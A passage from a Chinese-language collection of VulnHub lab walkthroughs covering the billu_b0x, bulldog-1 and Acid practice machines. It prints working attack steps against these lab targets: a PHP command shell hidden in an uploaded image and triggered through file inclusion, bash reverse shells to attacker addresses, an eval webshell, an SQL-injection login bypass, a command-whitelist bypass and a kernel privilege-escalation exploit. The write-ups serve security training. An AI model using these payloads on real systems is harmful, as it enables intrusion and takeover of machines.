src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /> </p><ul><li>步驟10:回到步驟6,通過得到的mysql密碼登錄phpmyadmin</li></ul><p>用戶名:billu,密碼:b0x_billu,登錄成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>在<code>ica_lab</code>數據庫的auth表中,找到web登錄的用戶名:biLLu,密碼:hEx_it。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /> </p><h2><a name='header-n7650' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟11:登錄index首頁,並獲得cmd shell和反彈shell</li></ul><p>(1) 使用web密碼登錄首頁,大小寫必須一樣。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登錄后是賬號管理界面,賬號是加勒比海盜的兩位主角船長:傑克·斯帕羅和巴博薩船長。多寫一句,本人更喜歡巴博薩船長,一個像敵人一樣的海盜朋友,幽默、勇敢、陰險狡詐、霸道野心、老謀深算。</p><p>兩個賬號的頭像圖片地址,在之前暴破出來:<code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 點擊add user進入添加賬號界面,這是一個圖片上傳,思路是利用圖片上傳和文件包含獲得shell。</p><p>查看之前test文件包含獲得的panel.php源碼,發現panel.php存在本地文件包含漏洞:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下載一張<code>http://192.168.64.162/uploaded_images/</code>中的圖片jack.php,文本編輯器打開,在文件中間或末尾加入一句話cmd命令馬<code><?php system($_GET['cmd']); ?></code> 將文件上傳成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 使用burp執行命令:
post請求url中加入執行命令的參數:<code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>post的body中包含cmd.jpg圖片馬:<code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>成功執行命令<code>cat /etc/passwd;ls</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) 用bash反彈shell</p><p>命令:echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</p><p>需要將命令url編碼:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在post的url中發送命令:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc接收反彈shell成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟12:找一個可寫權限目錄,寫入菜刀馬</li></ul><p>文件上傳目錄uploaded_images為寫權限目錄,進入該目錄,寫一個菜刀馬:<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀連接成功,方便傳文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>提升權限</h2><ul><li>步驟13:查看內核、系統版本,尋找提權exp</li></ul><p>(1) 查看系統內核版本,命令<code>uanme -a</code>和<code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 下載Ubuntu著名的本地提權漏洞exp:</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟14:編譯、提權</li></ul><p>(1) 賦予執行權限 </p><p><code>chmod 777 37292.c</code></p><p>(2) 編譯exp</p><p><code>gcc 37292.c -o exp</code></p><p>(3) 執行exp,提權至root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n7746' class='md-header-anchor '></a>其他滲透思路</h3><p>正常的思路有3條路線可以突破。</p><p>思路1:構造注入:從test的文件包含獲得index.php源碼,源碼中可查看到過濾sql的方法,針對性構造sql注入,登錄后獲取shell再提權。</p><p>(1) 審計index.php源碼,發現以下過濾規則:</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>str_replace的作用是將字符串\' 替換為空,因此構造SQL注入登錄payload時,必須含有\'字符串,否則會報錯。urldecode的作用是將輸入解碼。</p><p>(2) 常見的利用注入登錄的payload是' or 1=1 -- 修改這個在最后增加\',str_replace會將這個\'替換為空。</p><p>使用php在線調試工具,測試如下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) 注入成功,payload是' or 1=1 -- \'</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>后面獲取shell方法和上面實驗相同。</p><p>思路2:暴破出phpmyadmin,文件包含從c.php獲得mysql密碼,登錄phpmyadmin,再獲取shell。</p><p>思路3:文件包含所有有權限查看的配置文件,從phpmyadmin配置文件獲得root密碼,然后ssh登錄。該過程盡管mysql故障,也可以完成。</p><ul><li>踩到的坑</li></ul><p>(1) mysql被高線程目錄暴破和注入宕機:導致phpmyadmin有正確密碼但無法登錄,耗費較長時間。這是意外故障。因為之前的2個工具同時目錄暴破、sqlmap注入等線程過高,導致mysql死了。</p><p>(2) test.php文件包含漏洞利用,get不行,改為post試試。包含成功后,要把各個頁面的源代碼拿下來審計。</p><p>(3) index.php的SQL注入花費不少時間,后來發現,即使不用sql注入,也有其他道路可以完成,通過phpmyadmin登錄,繞過了注入。</p><p>(4) panel.php的文件包含漏洞,如果不認真關注源碼,難以發現。使用test.php的文件包含,沒能觸發shell利用。</p><p>(5) 文件上傳+文件包含拿shell是靶機常用的方式,遇到兩個漏洞,可以熟練拿shell。</p><p>(6) 提權方法可以多關注主要的配置文件、數據庫連接文件、用戶的文件;也可以利用Ubuntu已知漏洞本地提權。</p><h1><a name='header-n7794' class='md-header-anchor '></a>第三節 bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>靶機信息</h2><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">作者:紅日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首發安全客:https://www.anquanke.com/post/id/106459</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h3><a name='header-n7797' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>靶機說明</h3><p>牛頭犬行業最近的網站被惡意的德國牧羊犬黑客破壞。這是否意味着有更多漏洞可以利用?你為什么找不到呢?:)</p><p>這是標准的Boot-to-Root,目標是進入root目錄並看到祝賀消息。</p><h3><a name='header-n7805' class='md-header-anchor '></a>目標</h3><p>獲得root權限和flag。</p><h3><a name='header-n7808' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機:用VirtualBox啟動虛機,導入鏡像,網絡連接方式設置為橋接到無線網卡。靶機啟動后,自動獲得IP:172.20.10.7。</li><li>Windows攻擊機:物理機,連接無線網卡,自動獲取IP:172.20.10.5,安裝有Burpsuit、nc、Python2.7、DirBuster等滲透工具。</li><li>​Kali攻擊機:VMWare啟動虛機,橋接到無線網卡,自動獲取IP:172.20.10.6。攻擊機二選一即可。</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>靶機啟動后,自動獲得IP,並且顯示在啟動完成后的界面,IP為:172.20.10.7。無需使用Nmap掃描C段發現IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服務識別</li></ul><p>使用nmap掃描1-65535全端口,並做服務指紋識別,掃描結果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>發現目標主機端口和服務如下:</p><p>端口         協議        后端服務</p><p>TCP 23      SSH        open-ssl 7.2p2</p><p>TCP 80      HTTP       WSGIServer Python 2.7.12     <br/></p><p>TCP 8080    HTTP       WSGIServer Python 2.7.12</p><p>操作系統:Linux 3.2-4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>web漏洞思路:</li></ul><p>(1) 查看每個網頁的源碼,看是否有提示;</p><p>(2) 暴破目錄,用DirBuster,看是否有新網頁,找新網頁的漏洞;</p><p>(3) 找注入或框架漏洞:如果網頁有輸入框、URL參數,可AWVS掃描注入;如果web使用了某些CMS框架,只能找框架的通用漏洞,通常掃描不到注入。</p><ul><li>ssh利用思路:</li></ul><p>(1) 如得到用戶名,可以用就九頭蛇或美杜莎暴破弱口令,但需要強大的字典且有弱口令。</p><p>(2) 如果得到web管理或系統賬號,可以嘗試連接ssh,如能連接上,無需反彈shell了。</p><ul><li>步驟1:瀏覽網頁,暴破目錄</li></ul><p>(1) 訪問 <code>http://172.20.10.7/</code> 進入首頁:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>首頁有鏈接,點擊進入notice頁面,未發現有價值的信息。</p><p>(2) 使用DirBuster暴破目錄,得到dev和admin目錄:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 訪問<code>http://172.20.10.7/admin</code>,這是一個Django管理后台,需要用戶名、密碼登錄,試了下沒有常見弱口令,先不嘗試暴破,去看看其他頁面。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 訪問<code>http://172.20.10.7/dev</code>,該頁面的有價值信息非常多,主要信息:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>新系統不在使用php或任何CMS,而是使用Django框架開發。這意味着不太可能再找到網頁的注入漏洞,只能找Django框架漏洞;網站不使用php,無需再找php漏洞或者寫php木馬;</p><p>新系統使用webshell管理,有一個Web-shell鏈接,點擊可訪問<code>http://172.20.10.7/dev/shell/</code>,但是需要認證。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟2:破解hash</li></ul><p>(1) 查看<code>http://172.20.10.7/dev</code>頁面源碼,會發現有每個Team Lead的郵箱和hash:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>並且有明顯的英文提示:We'll remove these in prod. It's not like a hacker can do anything with a hash。</p><p>(2) hash長度為40位,可以看出是sha1,即使不知道是哪種hash,也可以把每個hash值,到CMD5嘗試碰撞解密:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 最終解密出2個hash值:</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>用戶名:nick,密碼:bulldog (CMD5可免費解密出來)</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>用戶名:sarah,密碼:bulldoglover (CMD5需要收費解密出來)</p><ul><li>步驟3:登錄后台</li></ul><p>(1) 使用解密出來的密碼嘗試登錄掃描出來的23端口ssh都失敗:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 使用sarah、密碼bulldoglover成功登錄管理后台,發現沒有編輯權限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 再去訪問webshell頁面,已通過認證,可執行命令,這是一個命令執行界面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>獲取shell</h2><ul><li>步驟4:繞過白名單限制,執行系統命令: </li></ul><p>webshell頁面只能執行白名單的命令,嘗試用;或者&&連接,執行多個命令:</p><p>ls是白名單命令,id是禁止命令,通過<code>ls && id</code>可成功執行id命令,達到繞過白名單限制執行命令。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟5:反彈shell: </li></ul><p>(1) Windows攻擊機開啟nc監聽:<code>nc -lvnp 4444</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) 直接執行<code>ls && bash -i >& /dev/tcp/172.20.10.5/4444 0>&1</code>失敗,server報錯500。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 嘗試多次bash反彈,最后使用echo命令先輸出命令,再輸入到bash,反彈shell成功:</p><p><code>echo "bash -i >& /dev/tcp/172.20.10.5/4444 0>&1" | bash</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/25.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7969' class='md-header-anchor '></a>提升權限</h2><ul><li>步驟6:查看有哪些系統用戶 <code>cat /etc/passwd</code>, 發現需要關注的用戶有:bulldogadmin、django</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟7:查找每個用戶的文件(不顯示錯誤) <code>find / -user bulldogadmin 2>/dev/null</code></li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/18.png' alt='' referrerPolicy='no-referrer' /></p><p>(1) 發現值得關注的文件有:一個是note,一個是customPermissionApp。</p><p>/home/bulldogadmin/.hiddenadmindirectory/note</p><p>/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</p><p>(2) 打開note文本文件:發現提示webserver有時需要root權限訪問。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/19.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) 打開customPermissionApp,看上去是可執行文件,使用strings打印其中的可打印字符:</p><p><code>strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/20.png' alt='' referrerPolicy='no-referrer' /></p><p>note文件中提示執行該文件,可以獲得root權限,但通過ls查看文件權限只有讀權限,並無法執行。</p><ul><li>步驟8:拼接root密碼提權</li></ul><p>(1) 觀察文件中只有這些字符,疑似可能與密碼相關,英文單詞包括:SUPER、 ulitimate、PASSWORD、youCANTget,這些都與最高權限賬號相關,推測這是一個解謎題目:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/21.png' alt='' referrerPolicy='no-referrer' /></p><p>最直接的組合是去掉H,變成一句通順的英文句子:SUPERultimatePASSWORDyouCANTget</p><p>(2) su命令無法執行,提示:must be run from a terminal,上次Vulhub已經遇到過該問題,通過一句Python解決:</p><p><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>(3) 執行<code>sudo su -</code>,獲得root權限,獲取flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/22.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/23.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) 如果不解決無法su,還記得有23端口的ssh,也可以使用Xshell通過ssh登錄,登錄成功后執行sudo su - 提權並獲得flag</p><p>用戶名:<code>django</code></p><p>密碼:<code>SUPERultimatePASSWORDyouCANTget</code>   不用猜測的密碼,改了django再登錄也可以。</p><p>sudo su提權,密碼是:<code>SUPERultimatePASSWORDyouCANTget</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/24.png' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n8033' class='md-header-anchor '></a>靶場思路回顧</h2><p>1.目錄暴破出dev和admin頁面:</p><p>(1) 可暴破出dev頁面,該頁面源碼里面有多個賬號的用戶名、郵箱、密碼sha1值。該頁面還鏈接到webshell命令執行頁面。</p><p>(2) 可暴破出admin后台頁面,登錄密碼通過dev頁面破解sha1得到。</p><p>2.繞過白名單限制,執行命令和反彈shell:繞過限制執行命令比較容易。反彈shell嘗試多次使用bash反彈shell后成功,沒有嘗試py shell。</p><p>3.搜索系統中id為1000以后的用戶的文件,可以找到隱藏文件。</p><p>4.猜解root密碼很艱難。</p><h2><a name='header-n8046' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n8047' class='md-header-anchor '></a>難點和踩到的坑</h3><p>(1) 發現和破解sha1:在dev頁面查看源碼,發現多個用戶hash后,即使不知道是40位的sha1,也可以直接去cmd5破解,系統會自動識別,可以破解出2個賬號。如果用hashcat暴破sha1,需要強大的字段和較長的時間。</p><p>(2) 反彈shell應該有多種方法:第一個想到的是bash shell,也想到了python反彈shell。只嘗試了通過bash反彈shell,如果bash反彈不成功,可嘗試往系統echo文件,賦予+x執行權限,執行腳本反彈。也可嘗試Python是否能夠反彈shell。</p><p>(3) 發現隱藏的包含root密碼的文件,通過搜索id為1000之后的用戶文件,查看歷史命令,或者查看目錄,也可能找到。</p><p>(4) 猜解root密碼:這個是最難的,找到這個文件並不難,但是通過strings查看文件內容,並且拼接字符串為root密碼,感覺難度很大。</p><h1><a name='header-n8056' class='md-header-anchor '></a>第四節 Acid</h1><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">作者:紅日安全</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">首發安全客:https://www.anquanke.com/post/id/10546</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><h2><a name='header-n8058' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8059' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/acid/Acid.rar' target='_blank' class='url'>https://download.vulnhub.com/acid/Acid.rar</a></p><h3><a name='header-n8062' class='md-header-anchor '></a>靶機說明</h3><p>Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.</p><p>歡迎來到Acid的世界。童話故事需要使用秘密鑰匙打開魔法門。</p><h3><a name='header-n8068' class='md-header-anchor '></a>目標</h3><p>獲得root權限和flag。</p><h3><a name='header-n8071' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機配置:該虛擬機完全基於Web,提取rar並使用VMplayer運行vmx,網絡連接方式設置為net,靶機自動獲取IP。</li><li>攻擊機配置:同網段下有Windows攻擊機,安裝有Burpsuit、nc、Python2.7、DirBuster、御劍等滲透工具。</li><li>​</li></ul><h2><a name='header-n8082' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>啟用Acid虛擬機,由於網絡設置為net模式,使用Nmap掃描VMware Network Adapter VMnet8網卡的NAT網段,即可找到虛機IP,掃描結果保存到txt文件,命令:</p><p><code>nmap -sP 192.168.64.0/24 -oN acid-ip.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><p>獲得目標ip <code>192.168.64.153</code></p><ul><li>端口掃描</li></ul><p>使用nmap掃描1-65535全端口,並做服務指紋識別,掃描結果保存到txt文件,命令:</p><p><code>nmap -p1-65535 -sV -oN acid-port.txt 192.168.64.153</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>目標主機的33447端口發現web服務,web服務器是Apache2.4.10,操作系統ubuntu。</p><p><code>http://192.168.64.153:33447</code> 進入主頁:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>服務識別</li></ul><p>只發現web服務和Apache,只能從web漏洞或者Apache漏洞入手(如有漏洞):</p><p>端口:Tcp 33447</p><p>底層服務:Apache2.4.10</p><p>操作系統:Ubuntu</p><h2><a name='header-n8124' class='md-header-anchor '></a>漏洞挖掘的詳細思路</h2><ul><li>web挖掘思路:</li></ul><p>(1) 查看每個網頁的源碼,看是否有提示;</p><p>(2) 暴破目錄,用御劍或DirBuster,看是否有新網頁,找新網頁的漏洞;</p><ul><li>Apache挖掘思路:</li></ul><p>(1) 尋找Apache2.4.10有無已知漏洞可利用:沒有發現可直接利用的漏洞。</p><p>(2) 到<a href='http://www.exploit-db.com' target='_blank' class='url'>www.exploit-db.com</a>查詢有無exp:沒有找到exp。</p><p>(3) Nessus掃描一下主機漏洞:沒有掃描出漏洞。</p><ul><li>實在找不到漏洞:單用戶模式進入Ubuntu,看源碼吧。</li></ul><ul><li>步驟1:首先看主頁源碼,發現提示:0x643239334c6d70775a773d3d</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>0x是16進制編碼,將值643239334c6d70775a773d3d進行ASCII hex轉碼,變成:d293LmpwZw==</p><p>發現是base64編碼,再進行解碼,得到圖片信息 wow.jpg</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>這時可以根據經驗在首頁直接加目錄打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 網站的圖片目錄通常是這樣命名。也可以利用dirbuster進行目錄爆破,得到圖片目錄images。</p><ul><li>訪問 <code>http://192.168.64.153:33447/images/wow.jpg</code> 得到圖片:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>將圖片保存到本地,用Notepad++打開,發現最下邊有提示</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><p>將3761656530663664353838656439393035656533376631366137633631306434進行ASCII hex轉碼,得到 7aee0f6d588ed9905ee37f16a7c610d4,這是一串md5。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>去cmd5解密,得到63425,推測是一個密碼或者ID。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟2:使用Dirbuster進行目錄暴破:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>查看暴破結果:發現challenge目錄,該目錄下有cake.php、include.php、hacked.php,用Burpsuit掛上代理,使用Firefox然后依次訪問3個文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟3:訪問cake.php,發現需要登錄后才能訪問:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><p>該頁面如果看頁面title或者看burpsuit的Response返回值的<title>/Magic_Box</title>,會發現有/Magic_Box目錄存在,先看其他頁面。</p><p>點擊login會跳轉到index.php登錄頁面,需要email和密碼才能登錄:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟4:訪問include.php,這是一個文件包含漏洞頁面:</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>在輸入框中輸入 /etc/passwd 測試存在文件包含,Burpsuit顯示response包如下:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/15.png' alt='' referrerPolicy='no-referrer' /></p><p>想文件包含拿shell,但沒有文件上傳點,之前發現的wow.jpg中無木馬可包含。先繼續看hacked.php。</p><ul><li>步驟5:訪問cake.php,需要輸入ID,測試下之前從wow.jpg解密出來的數字:63425</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/16.png' alt='' referrerPolicy='no-referrer' /></p><p>然后,什么也沒有發生,看來ID不對,或者需要先通過index頁面輸入email和密碼登錄。</p><ul><li>步驟6:找注入,把發現的幾個頁面都送入AWVS掃描了漏洞,未發現注入。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/17.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>步驟7:繼續暴破發現的Magic_Box目錄:發現low.php,command.php</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/_image/18.png' alt='' referrerPolicy='no-referrer' 